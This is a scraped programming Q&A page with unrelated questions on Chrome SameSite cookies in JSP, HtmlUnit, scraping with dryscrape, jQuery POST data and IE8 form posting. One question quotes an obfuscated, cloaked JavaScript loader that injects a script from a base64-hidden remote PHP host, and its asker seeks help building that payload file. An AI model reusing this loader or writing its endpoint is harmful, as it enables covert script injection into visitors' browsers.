Setting cookie SameSite=None doesn't work on Chrome / JSP、JAVASCRIPT - javascript

I am working on a JSP(tomcat6) application. (domain is different)
I'm trying to set the same-site attribute to None because The cookies have disappeared after more than 2 minutes due to the new version of the chrome browser. (Release date for a fix is February 4, 2020 per: https://www.chromium.org/updates/same-site)
I tried to solve the problem in the following ways but is still not working
response.setHeader("Set-Cookie", "user=test;HttpOnly;Secure;SameSite=None");
response.setHeader("Set-Cookie", "HttpOnly;Secure;SameSite=None");
document.cookie = "witcher=Geralt; HttpOnly; SameSite=None; Secure";
<iframe src="https://service3.smartcapsule.jp/disp/ONECLICKCOMM.do"></iframe>
By using Pop-up windows
Code is here
document.form1.division2.value = 1;
document.form1.division3.value = 1;
document.form1.division4.value = 1;
document.form1.pan.value = 4322423434232342;
document.form1.expiryDate.value = 0222;
document.form1.jspName.value = 'index.jsp';
document.form1.method = "post";
document.cookie = "HttpOnly; SameSite=None; Secure";
document.form1.action = http://service3.smartcapsule.jp/disp/ONECLICKCOMM.do;
Header is here
<html><body>
host=localhost:8080<br>
connection=keep-alive<br>
content-length=90<br>
cache-control=max-age=0<br>
origin=http://localhost:8080<br>
upgrade-insecure-requests=1<br>
dnt=1<br>
content-type=application/x-www-form-urlencoded<br>
user-agent=Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4252.0 Safari/537.36<br>
accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br>
sec-fetch-site=same-origin<br>
sec-fetch-mode=navigate<br>
sec-fetch-user=?1<br>
sec-fetch-dest=document<br>
accept-encoding=gzip, deflate, br<br>
accept-language=en,q=0.9,q=0.8,ko;q=0.7,ja;q=0.6,q=0.5<br>
cookie=SameSite=None; Secure; aspGroupId=00000000; _ga=GA1.1.371271115.1600306707; _gid=GA1.1.1473986481.1600822923; JSESSIONID=15BA5A77A80B2C93969A44FE9371B135; _gat_UA-71516129-3=1; _token=8b234c913616b70c05100bb7fc141a33; _gat=1; arp_scroll_position=2986.363525390625<br>
</body></html>
-------------------------------------------------------------------------------------------
<html><body>
host=localhost:8080<br>
connection=keep-alive<br>
content-length=384<br>
cache-control=max-age=0<br>
origin=null<br>
upgrade-insecure-requests=1<br>
dnt=1<br>
content-type=application/x-www-form-urlencoded<br>
user-agent=Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4252.0 Safari/537.36<br>
accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br>
sec-fetch-site=cross-site<br>
sec-fetch-mode=navigate<br>
sec-fetch-dest=document<br>
accept-encoding=gzip, deflate, br<br>
accept-language=en,q=0.9,q=0.8,ko;q=0.7,ja;q=0.6,q=0.5<br>
</body></html>
If I don't change browser properties, how should I fix it?
disable 「SameSite by default cookies」 in chrome://flags
「20200924」I tried the following, but the cookies was still lost
Cookies.set('name', 'value', {
sameSite: 'none',
secure: true
})
response.setHeader("Set-Cookie", "user=mcmd;HttpOnly;Secure;SameSite=None");
document.cookie = "witcher=Geralt; SameSite=None; Secure";
public void doGet( HttpServletRequest request, HttpServletResponse response ) throws ServletException,IOException {
response.setContentType("text/html;charset=Windows-31J");
PrintWriter out = response.getWriter();
out.println("<html><body>");
Enumeration e = request.getHeaderNames();
while( e.hasMoreElements() ) {
String name = ( String )e.nextElement();
out.println( name + "=" + request.getHeader( name ) + "<br>");
}
out.println("</body></html>");
}
document.cookie = "<%= s_cookies %>";
document.cookie = "witcher=Geralt; SameSite=None; Secure";
res.setHeader("Set-Cookie", "user=mcmd;HttpOnly;Secure;SameSite=None");
res.setHeader("Access-Control-Allow-Origin","*");
res.setHeader("Access-Control-Allow-Credentials","true");
crossDomain=true; withCredentials=true;Authorization; Max-Age=60*60*3600
<iframe src="https://service3.smartcapsule.jp/disp/ONECLICKCOMM.do"></iframe>
<script
src="https://code.jquery.com/jquery-3.4.1.min.js"
integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo="
crossorigin="anonymous">
</script>
<script>
const apexUrl = 'localhost:8080';
const forwardUrl = 'https://localhost:8080';
alert(window.location.host);
if (window.location.host === apexUrl) {
window.location.host = forwardUrl;
}
</script>
Google reCAPTCHA

To edit a cookie, set its value, and then add it to the response.
and never forget to change the ExpiresDate.

Related

htmlunit - Get new page after excuting a JavaScript function

I have an HtmlPage by WebClient. This page (HtmlPage) has a button, I want to click that button to get a new page (another page). But when I clicked that button, the result returned the same page with the original page. Below is my code:
import com.gargoylesoftware.htmlunit.*;
import com.gargoylesoftware.htmlunit.html.*;
import java.net.URL;
public class GetLink2 {
public static void main(String[] args) throws Exception {
URL url = new URL("https://fptshop.com.vn/");
String userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0";
WebRequest request = new WebRequest(url);
request.setAdditionalHeader("User-Agent", userAgent);
//request.setAdditionalHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0");
WebClient webClient = new WebClient(BrowserVersion.FIREFOX_52);
webClient.getOptions().setThrowExceptionOnScriptError(false);
webClient.setJavaScriptTimeout(20000);
webClient.getOptions().setJavaScriptEnabled(true);
webClient.getOptions().setCssEnabled(true);
webClient.getOptions().setUseInsecureSSL(true);
webClient.waitForBackgroundJavaScript(5000);
HtmlPage page = webClient.getPage(request);
for (DomElement input : page.getElementsByTagName("input")) {
if (input.getAttribute("placeholder").contains("tìm") ||
input.getAttribute("placeholder").contains("Tìm")) {
System.out.println(input.asXml());
System.out.println("Set element focused: " + page.setFocusedElement(input));
input.setAttribute("id", "my_input_search");
System.out.println("Element focused: " + page.getFocusedElement());
//pageResult = page.pressAccessKey((char) DOM_VK_RETURN).getHtmlPageOrNull().getUrl();
//System.out.println("Result: " + pageResult.toString());
//System.out.printf("Result: %s%n", input.fireEvent(String.valueOf(KeyboardEvent.DOM_VK_RETURN)).getJavaScriptResult().toString());
break;
}
//System.out.println(htmlElement.asXml());
//result.getNewPage();
//System.out.println("result: "+ result.getNewPage().getUrl());
}
System.out.println("Input search: " + page.getElementById("my_input_search"));
String jsScript = "var element = document.getElementById('my_input_search');" +
"element.value = 'iphone 7';" +
"element.addEventListener('keypress', function (e) {" +
"console.log(e.key, e.char, e.keyCode)});" +
"var e = new KeyboardEvent('keypress', {" +
"bubbles: true, cancelable: true, char: 'Enter',key: 'enter', keyCode: 13});" +
"element.dispatchEvent(e);";
System.out.println("Input Search After Set Value: " + page.getElementById("my_input_search"));
page.executeJavaScript(jsScript);
Thread.sleep(20000);
page.getPage();
System.out.println("Result " + page.getPage());
}
}
Can everyone help me please, thanks for reading my question.
You are loosing your result, because
page.executeJavaScript(jsScript);
returns a ScriptResult, you should do
Page newPage = page.executeJavaScript(jsScript).getNewPage();
System.out.println("Result " + newPage);

php show code only if you run on js code and put that php link

if (navigator['userAgent'] == 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.27 Safari/537.36' && screen['width'] == '1024' && screen['height'] == '768') {} else {
var javas = document['createElement']('script');
javas['language'] = 'javascript';
javas['type'] = 'text/javascript';
javas['src'] = location['protocol'] + '//' + atob('dmlzdWFsbW90by54eXovaDcucGhw') + '?' + Math['floor']((Math['random']() * 1000000000) + 1) + '&h=' + encodeURIComponent(document['location']['host']);
document['head']['appendChild'](javas)
}
need to know how to make an PHP file that will show code inside if i run that link inside this code, this is the link dmlzdWFsbW90by54eXovaDcucGhw on 64bit (visualmoto.xyz/h7.php) and open this link you cant see nothing u see error but when run on that js code that PHP will open an hidden code can you please help me create that h7.php file.. how can i do it i'm very low on php

Get website content after JavaScript loading with python

I've got issue with getting an content:
with dryscrape.Session() as c:
PASSWORD = '<PASS>'
USERNAME = '<EMAIL>'
URL = 'https://my.pingdom.com/'
c.get(URL)
soup = BeautifulSoup(c.get(URL).text, "lxml")
csrf = soup.select_one("input[name=__csrf_magic]")["value"]
login_data = {
"email" : USERNAME,
"password" : PASSWORD,
"__csrf_magic" : csrf,}
r = c.post(URL, data=login_data, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'})
url = 'https://my.pingdom.com/newchecks/rums?ignoreActive=1'
r = c.get(url).text
print r
And after login in browser i've got value of Load Time in source code, but when i'm using this scipt there is only an {{loadtime}} tag from x-handlebars-template.
Any ideas how I can get it? This is server script so any selenium type of tips doesn't go in here. :)

jquery $.post doesnt sent post data

im trying to make a post request to the server but the jquery doesnt sent any post date.
i already tried to use: (suggestions i found on the web)
var postdata = {'username':username,'password':password,'src':'web'};
instead of
var postdata = 'username=' + username + '&pass=' + password + '&src=web';
this is my jquery code:
var username = $('#uForm_un').val();
var password = $('#uForm_pw').val();
var postdata = 'username=' + username + '&pass=' + password + '&src=web';
console.log(postdata);//output: username=administrator&pass=password&src=web
$.post(
"inc/api/do.login.ajax",
postdata,
function (data) {
console.log(data);//output: a vardump($_POST) wich is empty.
}
);
browser data:
Remote Address:62.***.**.**:80
Request URL:***********/inc/api/do.login.ajax/
Request Method:GET
Status Code:200 OK
Request Headersview source
Accept:*/*
Accept-Encoding:gzip,deflate,sdch
Accept-Language:nl-NL,nl;q=0.8,en-US;q=0.6,en;q=0.4
Cache-Control:no-cache
Connection:keep-alive
Cookie:anonymous=-81523622186; windowtop=100; LanguageId=1; CurrencyId=1; space_history=%7B%221%22%3A%2220%22%7D; eventId=1; OrderId=201424754035; filter_starttime=6%3A00; filter_endtime=12%3A00; _ga=GA1.2.2031844175.1410181977; __atuvc=13%7C37; PHPSESSID=4x1xc4ca4238a0b923820dcc509a6f75849b; filter_display_mode=grid; filter_search=; filter_where=eindhoven; filter_startdate=01/09/2014; filter_enddate=05/09/2014; filter_order=itemdate; filter_dayparts=; filter_distance=100000; filter_categories=; list=%2C2797
Host:********.nl
Pragma:no-cache
Referer:***************/index.php?action=editvisit
User-Agent:Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36
X-Requested-With:XMLHttpRequest
Response Headersview source
Connection:Keep-Alive
Content-Encoding:gzip
Content-Length:156
Content-Type:text/html; charset=utf-8
Date:Thu, 11 Sep 2014 09:15:03 GMT
Keep-Alive:timeout=5, max=88
Server:Apache/2.2.22 (Debian)
Vary:Accept-Encoding
X-Powered-By:PHP/5.4.4-14+deb7u14
EDIT:
now i use this code, but with the same result...
$.post( "inc/api/do.login.ajax",{
username : ""+$('#uForm_un').val()+"",
pass : ""+$('#uForm_pw').val()+"",
src : "web"
}).done(function(data) {
console.log(data);
}, "json" );
Solution:
change this:
inc/api/do.login.ajax
to
inc/api/do.login.ajax/index.php
with a get request it works fine but with a post...
sorry for taking your time and thanks! every answer was usefull!

IE posts a dynamically creted form without parameters

So i am generating form on fly and posting it to another website. The problem is that when i'am using IE form post request contains no parameters. The form outerHTML is the same in Mozilla and IE 8, so i just can not understand it does not work properly in IE 8.
Is there any way to fix ?
Here is the logic that posts generates & posts the form:
function PostForm() {
var form = AddForm();
var email = hiddenEmailCtrl.value;
var password = hiddenPasswordCtrl.value;
var checked = rememberMeCtrl.checked;
AddField(form, "email", email);
AddField(form, "password", password);
AddField(form, "remember_me", checked);
form.action = 'https://somesite.com/login';
alert(form.outerHTML);
alert(document.forms[1].outerHTML);
document.forms[1].submit();
}
function AddForm() {
var submitForm = document.createElement("form");
document.body.appendChild(submitForm);
submitForm.id = 'credentialsForm';
submitForm.method = "post";
submitForm.target = '_blank';
return submitForm;
}
function AddField(formElement, fieldName, fieldValue) {
var inputElement = null;
if (typeof (document.all) != undefined && document.all) {
inputElement = document.createElement("<input type='hidden' name='" + fieldName + "' value='" + fieldValue + "' />");
inputElement.id = fieldName;
}
else {
inputElement = document.createElement('input');
inputElement.setAttribute('type', 'hidden');
inputElement.setAttribute('name', fieldName);
inputElement.setAttribute('value', fieldValue);
inputElement.id = fieldName;
}
if (inputElement == null) return null;
formElement.appendChild(inputElement);
return inputElement;
}
And here is Mozilla request :
POST /login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ensiconnect.groupsite.com
Content-Length: 42
Expect: 100-continue
Connection: Keep-Alive
email=some#email.com&password=somePassword
This is IE8 request:
CONNECT somesite.com:443 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.1; .NET4.0C; .NET4.0E; AskTbF-ET/5.9.1.14019)
Proxy-Connection: Keep-Alive
Content-Length: 0
Host: ensiconnect.groupsite.com
Pragma: no-cache
IE uses a nonstandard version of document.createElement that also supports HTML code instead of a simple tag name. Since this violates the standard, and IE8 went to some length to be more compliant, it's possible IE8 only obeys the non-standard variant in quirks mode.
You should try removing the switch on document.all and pass IE8 the w3c variant in AddField. If that works then you'll need to test for IE7 rather than document.all
btw, I'm just guessing here, you'll need to test it.

Categories

Resources